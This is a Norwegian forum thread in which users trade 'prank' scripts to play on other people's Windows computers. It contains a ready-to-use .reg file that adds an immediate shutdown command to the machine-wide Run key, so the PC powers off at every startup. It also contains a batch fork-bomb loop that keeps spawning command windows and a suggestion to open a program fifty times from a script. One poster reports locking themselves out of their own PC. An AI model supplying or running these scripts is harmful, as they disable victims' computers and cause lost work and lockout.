Gå til innhold

Computer prank. Forslag?

brannmannsam

Anbefalte innlegg

Videoannonse
Annonse

min unpene feil. her er det du skal skrive i .reg fila. Bytt ut "ondskapsfulltnavnher" med navnet du vil ha OG BEHOLD HERMETEGNENE.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ondskapsfulltnavnher"="shutdown -s -t 00"

Lenke til kommentar

Funker fortsatt ikke... får bare spørsmål om jeg er sikker på om jeg vil legge den inn i registeret, trykker jeg JA får jeg en bekreftelse på at den er lagt inn i registeret, også skjer det ikke no.. :ermm:

Edit: Får vel legge inn en prank jeg å da :D Denna er ganske simpel, men den funker :)

Lag en .BAT fil, og skriv følgende:

:loop
start cmd
goto loop

Egentlig kan du skrive hva du vil istedet for "loop", bare det står det samme på "goto"

Endret av Fev4ng
Lenke til kommentar
Funker fortsatt ikke... får bare spørsmål om jeg er sikker på om jeg vil legge den inn i registeret, trykker jeg JA får jeg en bekreftelse på at den er lagt inn i registeret, også skjer det ikke no..  :ermm:

Edit: Får vel legge inn en prank jeg å da  :D  Denna er ganske simpel, men den funker  :)

Lag en .BAT fil, og skriv følgende:

:loop
start cmd
goto loop

Egentlig kan du skrive hva du vil istedet for "loop", bare det står det samme på "goto"

8248805[/snapback]

Denne fila har da lagt til registerendringer som sier at ved oppstart skal denne maskinen skru seg av.

Start maskinen på nytt så ser du detta :D.

shutdown -s skriv dette i cmd så ser du at den skrus av :)

En annen prank er å starte feks. Spider.exe i batch skript som du kopiere 50 ganger i skripta slik at en må lukke programmet 50x før den endelig forsvinner..

Lenke til kommentar
Hehe, "Funker fortsatt ikke..." du liksom!

Hvis jeg avslører hvordan du skal stoppe det her er jo hele vitsen borte. Men jeg har et spesialtilbud: Kun kr. 500 + omkostninger og jeg skal fortelle deg det...

8252534[/snapback]

Nei takk, hvis dette var et seriøst tilbud takker jeg nei og venter på et gratis svar i stedet :D Hvis det var ironisk ment, var det i så fall utrolig dårlig. :thumbup:

Lenke til kommentar
Alreit, nå har jeg vært dum nok til å prøve shutdown-opplegget på min egen pc, og har brukt de siste 2,5 timene på å skru den på siden den hele tiden skrur seg av ved oppstart.  :ph34r:  :p

Noen tips til hvordan jeg kan fikse dette?

8252229[/snapback]

:rofl:

Lenke til kommentar

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!

Start en konto

Logg inn

Har du allerede en konto? Logg inn her.

Logg inn nå
  • Hvem er aktive   0 medlemmer

• Ingen innloggede medlemmer aktive
  • Opprett ny...